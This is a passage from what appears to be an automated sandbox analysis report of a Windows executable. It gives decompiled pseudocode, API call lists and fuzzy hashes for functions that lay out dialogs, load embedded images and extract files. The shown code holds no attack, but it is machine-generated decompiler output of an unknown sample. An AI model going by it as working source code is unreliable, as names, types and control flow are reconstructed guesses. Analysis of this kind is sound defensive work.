                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(?,000000F0), ref: 00408F05
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F14
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F22
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F30
                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(000000F0,000000F0), ref: 00408F3C
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F4B
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F58
                                          • GetDlgItem.USER32 ref: 004093BB
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 004093C0
                                          • GetDlgItem.USER32 ref: 004093D0
                                          • SetWindowLongW.USER32 ref: 004093D3
                                          • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004093F9
                                          • EnableMenuItem.USER32 ref: 0040940B
                                          • GetDlgItem.USER32 ref: 00409415
                                          • SetFocus.USER32(00000000), ref: 00409418
                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00409447
                                          • CoCreateInstance.OLE32(0041FA54,00000000,00000001,0041EFE4,?), ref: 0040946C
                                          • GetDlgItem.USER32 ref: 0040948D
                                          • IsWindow.USER32(00000000), ref: 00409490
                                          • GetDlgItem.USER32 ref: 004094A0
                                          • EnableWindow.USER32(00000000), ref: 004094A3
                                          • GetDlgItem.USER32 ref: 004094B7
                                          • ShowWindow.USER32(00000000), ref: 004094BA
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Item$Window$Long$MessageSend$System$EnableHandleLoadMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTextTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                          • String ID:
                                          • API String ID: 957878288-0
                                          • Opcode ID: e2f02459deb40e79b423d59a5e6600ce65444f24f98bf66ec9fc20f3b27b8bdb
                                          • Instruction ID: 82f3168065e5e37885ea10ad8f323bea47048e436c2f5ba3df634f29c1837039
                                          • Opcode Fuzzy Hash: e2f02459deb40e79b423d59a5e6600ce65444f24f98bf66ec9fc20f3b27b8bdb
                                          • Instruction Fuzzy Hash: E14155B0604709BBDA206B21DD49F5B7B9DEB84B04F40453EF555A62E1CB79AC01CB2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403B31, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 121windowcommemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E00403B31(struct HWND__* __ecx) {
				int _v8;
				long _v12;
				void* _v16;
				struct HWND__* _v20;
				void* _v24;
				int _v40;
				int _v44;
				void _v48;
				char _v112;
				char* _t41;
				intOrPtr* _t44;
				intOrPtr* _t47;
				intOrPtr* _t49;
				void* _t53;
				void* _t57;
				void* _t67;
				struct HWND__* _t68;

				_t68 = __ecx;
				_v20 = __ecx;
				if(GetClassNameA(__ecx,  &_v112, 0x40) == 0 || lstrcmpiA( &_v112, "STATIC") != 0 || (GetWindowLongW(_t68, 0xfffffff0) & 0x0000000e) == 0) {
					L13:
					return 0;
				} else {
					_t57 = E00403908("IMAGES", GetMenu(_t68),  &_v12);
					if(_t57 == 0 || _v12 < 0x10) {
						goto L13;
					} else {
						_t67 = GlobalAlloc(0x40, _v12);
						if(_t67 == 0) {
							goto L13;
						}
						memcpy(_t67, _t57, _v12);
						__imp__CoInitialize(0);
						_t41 =  &_v16;
						__imp__CreateStreamOnHGlobal(_t67, 0, _t41);
						if(_t41 != 0 || _v16 == 0) {
							GlobalFree(_t67);
							goto L13;
						} else {
							__imp__#418(_v16, 0, 0, 0x41fa34,  &_v24);
							_t44 = _v16;
							 *((intOrPtr*)( *_t44 + 8))(_t44);
							GlobalFree(_t67);
							_t47 = _v24;
							if(_t47 == 0) {
								goto L13;
							}
							_v8 = 0;
							 *((intOrPtr*)( *_t47 + 0xc))(_t47,  &_v8);
							_t62 = _v8;
							if(_v8 != 0) {
								_t53 = E004039F1(_t62);
								_v8 = _t53;
								GetObjectW(_t53, 0x18,  &_v48);
								SetWindowPos(_v20, 0, 0, 0, _v44, _v40, 6);
								SendMessageW(_v20, 0x172, 0, _v8);
							}
							_t49 = _v24;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							return 1;
						}
					}
				}
			}




















                                          0x00403b3f
                                          0x00403b43
                                          0x00403b4e
                                          0x00403c7e
                                          0x00000000
                                          0x00403b7c
                                          0x00403b93
                                          0x00403b99
                                          0x00000000
                                          0x00403ba9
                                          0x00403bb4
                                          0x00403bb8
                                          0x00000000
                                          0x00000000
                                          0x00403bc3
                                          0x00403bcc
                                          0x00403bd2
                                          0x00403bd8
                                          0x00403be0
                                          0x00403c78
                                          0x00000000
                                          0x00403bef
                                          0x00403bfd
                                          0x00403c03
                                          0x00403c09
                                          0x00403c0d
                                          0x00403c13
                                          0x00403c18
                                          0x00000000
                                          0x00000000
                                          0x00403c1e
                                          0x00403c24
                                          0x00403c27
                                          0x00403c2c
                                          0x00403c2e
                                          0x00403c3a
                                          0x00403c3d
                                          0x00403c51
                                          0x00403c63
                                          0x00403c63
                                          0x00403c69
                                          0x00403c6f
                                          0x00000000
                                          0x00403c74
                                          0x00403be0
                                          0x00403b99

                                          APIs
                                          • GetClassNameA.USER32(?,?,00000040), ref: 00403B46
                                          • lstrcmpiA.KERNEL32(?,STATIC,?,?,00000040), ref: 00403B5D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00403B6E
                                          • GetMenu.USER32 ref: 00403B81
                                            • Part of subcall function 00403908: GetModuleHandleW.KERNEL32(00000000), ref: 00403919
                                            • Part of subcall function 00403908: FindResourceExA.KERNEL32(00000000,?,?), ref: 00403937
                                            • Part of subcall function 00403908: FindResourceExA.KERNEL32(?,?,?,00000409), ref: 0040394E
                                            • Part of subcall function 00403908: SizeofResource.KERNEL32(?,00000000), ref: 00403961
                                            • Part of subcall function 00403908: LoadResource.KERNEL32(?,00000000), ref: 0040396D
                                            • Part of subcall function 00403908: LockResource.KERNEL32(00000000), ref: 00403978
                                          • GlobalAlloc.KERNEL32(00000040,00000010,?,?,000000F0,?,?,00000040), ref: 00403BAE
                                          • memcpy.MSVCRT ref: 00403BC3
                                          • CoInitialize.OLE32(00000000), ref: 00403BCC
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00403BD8
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041FA34,?), ref: 00403BFD
                                          • GlobalFree.KERNEL32 ref: 00403C0D
                                            • Part of subcall function 004039F1: GetWindowDC.USER32(00000000), ref: 00403A00
                                            • Part of subcall function 004039F1: GetDeviceCaps.GDI32(00000000,00000058), ref: 00403A0C
                                            • Part of subcall function 004039F1: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403A25
                                            • Part of subcall function 004039F1: GetObjectW.GDI32(?,00000018,?), ref: 00403A5C
                                            • Part of subcall function 004039F1: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403A69
                                            • Part of subcall function 004039F1: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403A75
                                            • Part of subcall function 004039F1: CreateCompatibleDC.GDI32(?), ref: 00403A83
                                            • Part of subcall function 004039F1: CreateCompatibleDC.GDI32(?), ref: 00403A8B
                                            • Part of subcall function 004039F1: SelectObject.GDI32(00000002,?), ref: 00403A9B
                                            • Part of subcall function 004039F1: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403AA9
                                            • Part of subcall function 004039F1: SelectObject.GDI32(00000000,00000000), ref: 00403AB1
                                            • Part of subcall function 004039F1: SetStretchBltMode.GDI32(00000000,00000004), ref: 00403AB9
                                            • Part of subcall function 004039F1: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403AD8
                                            • Part of subcall function 004039F1: GetCurrentObject.GDI32(00000000,00000007), ref: 00403AE1
                                            • Part of subcall function 004039F1: SelectObject.GDI32(00000002,?), ref: 00403AF0
                                            • Part of subcall function 004039F1: SelectObject.GDI32(00000000,?), ref: 00403AF6
                                            • Part of subcall function 004039F1: DeleteDC.GDI32(00000002), ref: 00403B01
                                            • Part of subcall function 004039F1: DeleteDC.GDI32(00000000), ref: 00403B04
                                            • Part of subcall function 004039F1: ReleaseDC.USER32 ref: 00403B0A
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00403C3D
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00403C51
                                          • SendMessageW.USER32(?,00000172,00000000,?), ref: 00403C63
                                          • GlobalFree.KERNEL32 ref: 00403C78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                          • String ID: IMAGES$STATIC
                                          • API String ID: 4202116410-1168396491
                                          • Opcode ID: 0927fdd96c8a672e4edb8bf6fba54bde9fa129fa8547b2b49592ff7c41df4a32
                                          • Instruction ID: b651b05a898d6b36c18c6da2e71faa2375cac1702eff8c2c698f256589fd88ae
                                          • Opcode Fuzzy Hash: 0927fdd96c8a672e4edb8bf6fba54bde9fa129fa8547b2b49592ff7c41df4a32
                                          • Instruction Fuzzy Hash: 5A412CB2A00218BBDB119FA1CD48DEFBF7DEF4A701B104466F915F2190D7788A41CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407ACF, Relevance: 27.3, APIs: 18, Instructions: 297COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E00407ACF(void* __ecx, int __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				int _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				int _v32;
				struct tagRECT _v48;
				intOrPtr _t116;
				int _t118;
				int _t120;
				struct HWND__* _t131;
				int _t139;
				void* _t166;
				signed int _t168;
				int _t210;
				struct HWND__* _t211;
				long _t215;
				intOrPtr _t219;
				intOrPtr _t225;
				int _t231;
				int _t234;
				int _t235;
				void* _t239;

				_t234 = __edx;
				_t239 = __ecx;
				_v28 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				if((GetWindowLongW(GetDlgItem( *(__ecx + 4), 0x4b3), 0xfffffff0) & 0x10000000) != 0) {
					E00407925(_t239, 0x4b3,  &_v48);
					_v28 = 0x4b3;
					_v16 = _v48.right.x - _v48.left;
					_v24 = _v48.bottom - _v48.top;
				}
				if((GetWindowLongW(GetDlgItem( *(_t239 + 4), 0x4b4), 0xfffffff0) & 0x10000000) != 0) {
					E00407925(_t239, 0x4b4,  &_v48);
					_v28 = 0x4b4;
					_v8 = _v48.right.x - _v48.left;
					_v24 = _v48.bottom - _v48.top;
				}
				_t219 = _v16;
				_t116 = _v8;
				if(_t219 > 0 && _t116 > 0) {
					if(_t116 <= _t219) {
						_v8 = _t219;
						_t116 = _t219;
					} else {
						_v16 = _t116;
						_t219 = _t116;
					}
				}
				if(_v28 == 0) {
					L15:
					_t118 = _v12 + 0x1a;
					if(_t118 >  *(_t239 + 0x14)) {
						 *(_t239 + 0x14) = _t118;
					}
					_v12 = _t118 - 0x1a;
					_t120 = GetSystemMetrics(0x10);
					_v32 = GetSystemMetrics(0x11);
					 *(_t239 + 0x14) =  *(_t239 + 0x14) + GetSystemMetrics(8);
					 *(_t239 + 0x18) =  *(_t239 + 0x18) + GetSystemMetrics(7);
					asm("cdq");
					_t210 = _t120 -  *(_t239 + 0x14) - _t234 >> 1;
					asm("cdq");
					_v20 = _v32 -  *(_t239 + 0x18) - _t234 >> 1;
					_t131 = GetParent( *(_t239 + 4));
					_v32 = _t131;
					if(_t131 != 0) {
						GetClientRect(_t131,  &_v48);
						ClientToScreen(_v32,  &_v48);
						ClientToScreen(_v32,  &(_v48.right));
						_t215 = _v48.left;
						_t235 =  *(_t239 + 0x14);
						_t231 = _v48.top;
						_v20 = _t231;
						if(_v48.right.x - _t215 > _t235) {
							asm("cdq");
							_t215 = (_v48.right.x - _t235 - _t215 - _t235 >> 1) + _v48.left;
						}
						_t234 =  *(_t239 + 0x18);
						if(_v48.bottom - _t231 > _t234) {
							asm("cdq");
							_v20 = (_v48.bottom - _t234 - _t231 - _t234 >> 1) + _t231;
						}
						_t210 = _t215 + 0xa;
						_v20 = _v20 + 0xa;
					}
					SetWindowPos( *(_t239 + 4), 0, _t210, _v20,  *(_t239 + 0x14),  *(_t239 + 0x18), 4);
					_t211 = 0;
					if( *((intOrPtr*)(_t239 + 0x30)) == 0) {
						E00407AA0(_t239, 0x4b2, 0xc, 0xa,  *((intOrPtr*)(_t239 + 0x28)) + 1,  *((intOrPtr*)(_t239 + 0x2c)) + 1, 0);
					} else {
						SetWindowPos(GetDlgItem( *(_t239 + 4), 0x4b1), 0, 0xc, 0xc, 0, 0, 5);
						E00407925(_t239, 0x4b1,  &_v48);
						_t225 =  *((intOrPtr*)(_t239 + 0x2c));
						_t166 = 2;
						_v48.bottom = _v48.bottom + _t166 - _v48.top;
						if(_t225 >= _v48.bottom) {
							_t168 = 0;
						} else {
							asm("cdq");
							_t168 = _v48.bottom - _t225 - _t234 >> 1;
						}
						E00407AA0(_t239, 0x4b2, _v48.right.x + 0xb, _t168 + 0xa,  *((intOrPtr*)(_t239 + 0x28)) + 1, _t225 + 1, 0);
						_t211 = 0;
					}
					if(_v28 != _t211) {
						GetClientRect( *(_t239 + 4),  &_v48);
						if(_v16 == _t211 || _v8 == _t211) {
							_push(1);
							_push(_t211);
							_push(_t211);
							_push(_v48.bottom - _v24 - 0xa);
							asm("cdq");
							_push(_v48.right.x - _v12 - _t234 >> 1);
							_push(_v28);
						} else {
							asm("cdq");
							E00407AA0(_t239, 0x4b3, _v48.right.x - _v12 - _t234 >> 1, _v48.bottom - _v24 - 0xa, _v16, _v24, _t211);
							E00407925(_t239, 0x4b3,  &_v48);
							_push(0);
							_push(_v24);
							_push(_v8);
							_push(_v48.top);
							_push(_v48.right.x + 0xa);
							_push(0x4b4);
						}
						E00407AA0(_t239);
					}
					 *(_t239 + 0x14) =  *(_t239 + 0x14) - GetSystemMetrics(8);
					_t139 = GetSystemMetrics(7);
					 *(_t239 + 0x18) =  *(_t239 + 0x18) - _t139;
					return _t139;
				} else {
					if(_t219 == 0) {
						L13:
						_v12 = _t116;
						goto L15;
					}
					if(_t116 == 0) {
						_v12 = _t219;
						goto L15;
					}
					_t116 = _t116 + _t219 + 0xa;
					goto L13;
				}
			}



























                                          0x00407acf
                                          0x00407ae5
                                          0x00407aeb
                                          0x00407aee
                                          0x00407af1
                                          0x00407af4
                                          0x00407b07
                                          0x00407b10
                                          0x00407b1b
                                          0x00407b1e
                                          0x00407b27
                                          0x00407b27
                                          0x00407b43
                                          0x00407b4c
                                          0x00407b57
                                          0x00407b5a
                                          0x00407b63
                                          0x00407b63
                                          0x00407b66
                                          0x00407b69
                                          0x00407b6e
                                          0x00407b76
                                          0x00407b7f
                                          0x00407b82
                                          0x00407b78
                                          0x00407b78
                                          0x00407b7b
                                          0x00407b7b
                                          0x00407b76
                                          0x00407b88
                                          0x00407b9e
                                          0x00407ba1
                                          0x00407ba7
                                          0x00407ba9
                                          0x00407ba9
                                          0x00407bb7
                                          0x00407bba
                                          0x00407bc4
                                          0x00407bc9
                                          0x00407bd0
                                          0x00407bdb
                                          0x00407be6
                                          0x00407be8
                                          0x00407bed
                                          0x00407bf0
                                          0x00407bf6
                                          0x00407bfb
                                          0x00407c02
                                          0x00407c15
                                          0x00407c1e
                                          0x00407c20
                                          0x00407c26
                                          0x00407c29
                                          0x00407c2e
                                          0x00407c33
                                          0x00407c3c
                                          0x00407c43
                                          0x00407c43
                                          0x00407c49
                                          0x00407c50
                                          0x00407c59
                                          0x00407c60
                                          0x00407c60
                                          0x00407c63
                                          0x00407c66
                                          0x00407c66
                                          0x00407c7b
                                          0x00407c81
                                          0x00407c86
                                          0x00407d0c
                                          0x00407c88
                                          0x00407ca1
                                          0x00407cae
                                          0x00407cb3
                                          0x00407cb8
                                          0x00407cbc
                                          0x00407cc2
                                          0x00407cd0
                                          0x00407cc4
                                          0x00407cc9
                                          0x00407ccc
                                          0x00407ccc
                                          0x00407ced
                                          0x00407cf2
                                          0x00407cf2
                                          0x00407d14
                                          0x00407d21
                                          0x00407d2a
                                          0x00407d86
                                          0x00407d88
                                          0x00407d8c
                                          0x00407d8d
                                          0x00407d94
                                          0x00407d99
                                          0x00407d9a
                                          0x00407d31
                                          0x00407d4f
                                          0x00407d56
                                          0x00407d62
                                          0x00407d6a
                                          0x00407d6c
                                          0x00407d72
                                          0x00407d75
                                          0x00407d78
                                          0x00407d79
                                          0x00407d79
                                          0x00407d9f
                                          0x00407d9f
                                          0x00407da8
                                          0x00407dad
                                          0x00407daf
                                          0x00407db6
                                          0x00407b8a
                                          0x00407b8c
                                          0x00407b96
                                          0x00407b96
                                          0x00000000
                                          0x00407b96
                                          0x00407b90
                                          0x00407b9b
                                          0x00000000
                                          0x00407b9b
                                          0x00407b92
                                          0x00000000
                                          0x00407b92

                                          APIs
                                          • GetDlgItem.USER32 ref: 00407AF7
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00407AFC
                                          • GetDlgItem.USER32 ref: 00407B33
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00407B38
                                          • GetSystemMetrics.USER32 ref: 00407BBA
                                          • GetSystemMetrics.USER32 ref: 00407BC0
                                          • GetSystemMetrics.USER32 ref: 00407BC7
                                          • GetSystemMetrics.USER32 ref: 00407BCE
                                          • GetParent.USER32(?), ref: 00407BF0
                                          • GetClientRect.USER32 ref: 00407C02
                                          • ClientToScreen.USER32(?,?), ref: 00407C15
                                          • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407C7B
                                          • GetDlgItem.USER32 ref: 00407C9A
                                          • SetWindowPos.USER32(00000000), ref: 00407CA1
                                          • GetClientRect.USER32 ref: 00407D21
                                            • Part of subcall function 00407AA0: GetDlgItem.USER32 ref: 00407ABE
                                            • Part of subcall function 00407AA0: SetWindowPos.USER32(00000000), ref: 00407AC5
                                          • ClientToScreen.USER32(?,?), ref: 00407C1E
                                            • Part of subcall function 00407925: GetDlgItem.USER32 ref: 0040792D
                                          • GetSystemMetrics.USER32 ref: 00407DA6
                                          • GetSystemMetrics.USER32 ref: 00407DAD
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MetricsSystem$ItemWindow$Client$LongRectScreen$Parent
                                          • String ID:
                                          • API String ID: 2671006076-0
                                          • Opcode ID: ee3a9b64024e76f4bf430920567e8bf6af21306f3b050522a7c71071a4c730ea
                                          • Instruction ID: 79bfce518a1b3777c3be141dac1d4c923f3e13946b8f7072fb596655451fe251
                                          • Opcode Fuzzy Hash: ee3a9b64024e76f4bf430920567e8bf6af21306f3b050522a7c71071a4c730ea
                                          • Instruction Fuzzy Hash: 1FA13BB1E04209AFDB10DFB9CD85AEEBBF9EF48304F144529E615F2291D778E9008B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004028F2, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 294COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E004028F2(signed int* _a4, long _a8, signed int* _a12, signed int _a16) {
				char _v16;
				signed int _v24;
				char _v28;
				long _v32;
				signed int _v36;
				short _v42;
				signed short _v44;
				signed int _v52;
				short _v58;
				signed int _v60;
				struct _SYSTEMTIME _v76;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t116;
				intOrPtr* _t119;
				intOrPtr* _t122;
				signed int _t123;
				intOrPtr* _t125;
				signed int _t126;
				intOrPtr* _t130;
				signed int _t131;
				signed int _t132;
				signed int _t136;
				signed int _t138;
				signed int _t141;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t154;
				signed int _t161;
				signed int _t171;
				intOrPtr _t184;
				signed int* _t211;
				intOrPtr* _t213;
				intOrPtr* _t218;
				signed int _t219;
				intOrPtr _t221;

				_t221 =  *0x4228cc; // 0x0
				if(_t221 == 0) {
					 *_a12 = 0;
					__eflags = _a16;
					if(_a16 == 0) {
						_t218 = _a4;
						_t211 = _t218 + 0x20;
						_t108 =  *_t211;
						_a4 = _t211;
						__eflags = _t108;
						if(_t108 != 0) {
							 *((intOrPtr*)( *_t108 + 8))(_t108);
							 *_t211 = 0;
						}
						_v60 = 0;
						_v58 = 0;
						_t110 =  *0x4227c0; // 0x566888
						_v52 = 0;
						_t111 =  *((intOrPtr*)( *_t110 + 0x18))(_t110, _a8, 3,  &_v60);
						__eflags = _t111;
						if(_t111 == 0) {
							E004147DF(_t111,  &_v16);
							__eflags = _v60;
							if(_v60 == 0) {
								L50:
								_t219 =  *((intOrPtr*)( *_t218 + 0x1c))(_t218, 0x64);
								L51:
								_push(_v16);
								L0041C160();
								L52:
								goto L53;
							}
							__eflags = _v60 - 8;
							if(_v60 != 8) {
								goto L50;
							}
							E00414864( &_v16, _v52);
							_t119 = E0041476B( &_v28, _t218 + 0xc,  &_v16);
							_t213 = _t218 + 0x24;
							E00414864(_t213,  *_t119);
							L0041C160();
							_v44 = 0;
							_v42 = 0;
							_t122 =  *0x4227c0; // 0x566888
							_v36 = 0;
							_t123 =  *((intOrPtr*)( *_t122 + 0x18))(_t122, _a8, 9,  &_v44, _v28);
							_a16 = _t123;
							__eflags = _t123;
							if(_t123 == 0) {
								__eflags = _v44;
								if(_v44 != 0) {
									__eflags = _v44 - 0x13;
									if(_v44 == 0x13) {
										 *((intOrPtr*)(_t218 + 0x44)) = _v36;
										L20:
										_t125 =  *0x4227c0; // 0x566888
										_t126 =  *((intOrPtr*)( *_t125 + 0x18))(_t125, _a8, 6,  &_v44);
										_a16 = _t126;
										__eflags = _t126;
										if(_t126 != 0) {
											goto L11;
										}
										__eflags = _v36;
										_t207 =  &_v44;
										 *(_t218 + 0x40) = 0 | _v36 != 0x00000000;
										_t130 =  *0x4227c0; // 0x566888
										_t131 =  *((intOrPtr*)( *_t130 + 0x18))(_t130, _a8, 0xc,  &_v44);
										_a8 = _t131;
										__eflags = _t131;
										if(_t131 == 0) {
											_t132 = _v44 & 0x0000ffff;
											__eflags = _t132;
											if(_t132 == 0) {
												GetLocalTime( &_v76);
												_t170 = _t218 + 0x38;
												SystemTimeToFileTime( &_v76, _t218 + 0x38);
												L28:
												__eflags =  *(_t218 + 0x40);
												_t184 =  *_t213;
												if( *(_t218 + 0x40) == 0) {
													_t136 = E00404402(_t184, _t170);
													__eflags = _t136 - 0xffffffff;
													if(_t136 == 0xffffffff) {
														_t138 =  *((intOrPtr*)( *_t218 + 0x20))(_t218, 0x69, GetLastError());
														L17:
														_t219 = _t138;
														L18:
														E00414129( &_v44);
														goto L51;
													}
													__eflags = _t136 - 1;
													if(_t136 == 1) {
														L31:
														E00414129( &_v44);
														_push(_v16);
														L0041C160();
														_t219 = 0;
														goto L52;
													}
													_push(0x18);
													L0041C16C();
													_t171 = 0;
													__eflags = _t136;
													if(_t136 != 0) {
														 *((intOrPtr*)(_t136 + 4)) = 0;
														 *_t136 = 0x41db9c;
														_t67 = _t136 + 8;
														 *_t67 =  *(_t136 + 8) | 0xffffffff;
														__eflags =  *_t67;
														_t171 = _t136;
													}
													 *(_t218 + 0x1c) = _t171;
													__eflags = _t171;
													if(_t171 != 0) {
														 *((intOrPtr*)( *_t171 + 4))(_t171);
													}
													_t141 =  *(_t218 + 0x1c);
													 *(_t141 + 0x10) =  *(_t141 + 0x10) & 0x00000000;
													 *(_t141 + 0x14) =  *(_t141 + 0x14) & 0x00000000;
													__eflags = E00414091( *_t213, 1);
													if(__eflags != 0) {
														L48:
														E004160A2(_a4, _t171);
														 *_a12 = _t171;
														E00414129( &_v44);
														_push(_v16);
														L0041C160();
														E00414129( &_v60);
														_t116 = 0;
														goto L54;
													} else {
														_a8 = GetLastError();
														E00414839( &_v28, _t213);
														_t149 = E00403813( &_v28, __eflags);
														__eflags = _t149;
														if(_t149 >= 0) {
															_v24 = _t149;
															 *((short*)(_v28 + _t149 * 2)) = 0;
															_t150 = E0040468A(_v28, _v28);
															__eflags = _t150;
															if(_t150 != 0) {
																_t151 =  *(_t218 + 0x1c);
																 *(_t151 + 0x10) =  *(_t151 + 0x10) & 0x00000000;
																 *(_t151 + 0x14) =  *(_t151 + 0x14) & 0x00000000;
																_t152 = E00414091( *_t213, 1);
																__eflags = _t152;
																if(_t152 != 0) {
																	_push(_v28);
																	L0041C160();
																	goto L48;
																}
																_t154 =  *((intOrPtr*)( *_t218 + 0x20))(_t218, 0x6a, GetLastError());
																L41:
																_push(_v28);
																_t219 = _t154;
																L0041C160();
																__eflags = _t171;
																if(_t171 != 0) {
																	 *((intOrPtr*)( *_t171 + 8))(_t171);
																}
																goto L18;
															}
															_t154 =  *((intOrPtr*)( *_t218 + 0x1c))(_t218, 0x68);
															goto L41;
														}
														_t154 =  *((intOrPtr*)( *_t218 + 0x20))(_t218, 0x6a, _a8);
														goto L41;
													}
												}
												_t161 = E0040468A(_t184, _t207);
												__eflags = _t161;
												if(_t161 != 0) {
													goto L31;
												}
												_push(0x68);
												L16:
												_t138 =  *((intOrPtr*)( *_t218 + 0x1c))(_t218);
												goto L17;
											}
											__eflags = _t132 - 0x40;
											if(_t132 == 0x40) {
												_t170 = _t218 + 0x38;
												_t170->dwLowDateTime = _v36;
												_t170->dwHighDateTime = _v32;
												goto L28;
											}
											_push(0x66);
											goto L16;
										}
										E00414129( &_v44);
										_push(_v16);
										L0041C160();
										_t219 = _a8;
										goto L52;
									}
									_push(0x65);
									goto L16;
								}
								 *((intOrPtr*)(_t218 + 0x44)) = 0;
								goto L20;
							}
							L11:
							E00414129( &_v44);
							_push(_v16);
							L0041C160();
							_t219 = _a16;
							goto L52;
						} else {
							_t219 = _t111;
							L53:
							E00414129( &_v60);
							_t116 = _t219;
							L54:
							return _t116;
						}
					}
					return 0;
				}
				return 0x80004004;
			}










































                                          0x004028fb
                                          0x00402901
                                          0x00402910
                                          0x00402912
                                          0x00402915
                                          0x0040291f
                                          0x00402923
                                          0x00402926
                                          0x00402928
                                          0x0040292b
                                          0x0040292d
                                          0x00402932
                                          0x00402935
                                          0x00402935
                                          0x00402942
                                          0x00402946
                                          0x0040294a
                                          0x0040294f
                                          0x00402955
                                          0x00402958
                                          0x0040295a
                                          0x00402966
                                          0x0040296b
                                          0x0040296f
                                          0x00402c20
                                          0x00402c28
                                          0x00402c2a
                                          0x00402c2a
                                          0x00402c2d
                                          0x00402c32
                                          0x00000000
                                          0x00402c32
                                          0x00402975
                                          0x0040297a
                                          0x00000000
                                          0x00000000
                                          0x00402986
                                          0x00402995
                                          0x0040299c
                                          0x004029a1
                                          0x004029a9
                                          0x004029ba
                                          0x004029be
                                          0x004029c2
                                          0x004029c7
                                          0x004029cd
                                          0x004029d0
                                          0x004029d3
                                          0x004029d5
                                          0x004029ef
                                          0x004029f3
                                          0x004029fa
                                          0x004029ff
                                          0x00402a1b
                                          0x00402a1e
                                          0x00402a1e
                                          0x00402a2f
                                          0x00402a32
                                          0x00402a35
                                          0x00402a37
                                          0x00000000
                                          0x00000000
                                          0x00402a3b
                                          0x00402a3f
                                          0x00402a4b
                                          0x00402a4e
                                          0x00402a56
                                          0x00402a59
                                          0x00402a5c
                                          0x00402a5e
                                          0x00402a78
                                          0x00402a7c
                                          0x00402a7e
                                          0x00402aa0
                                          0x00402aa6
                                          0x00402aae
                                          0x00402ab4
                                          0x00402ab4
                                          0x00402ab8
                                          0x00402aba
                                          0x00402ae5
                                          0x00402aea
                                          0x00402aed
                                          0x00402c18
                                          0x00402a09
                                          0x00402a09
                                          0x00402a0b
                                          0x00402a0e
                                          0x00000000
                                          0x00402a0e
                                          0x00402af3
                                          0x00402af6
                                          0x00402acc
                                          0x00402acf
                                          0x00402ad4
                                          0x00402ad7
                                          0x00402adc
                                          0x00000000
                                          0x00402adc
                                          0x00402af8
                                          0x00402afa
                                          0x00402aff
                                          0x00402b02
                                          0x00402b04
                                          0x00402b06
                                          0x00402b09
                                          0x00402b0f
                                          0x00402b0f
                                          0x00402b0f
                                          0x00402b13
                                          0x00402b13
                                          0x00402b15
                                          0x00402b18
                                          0x00402b1a
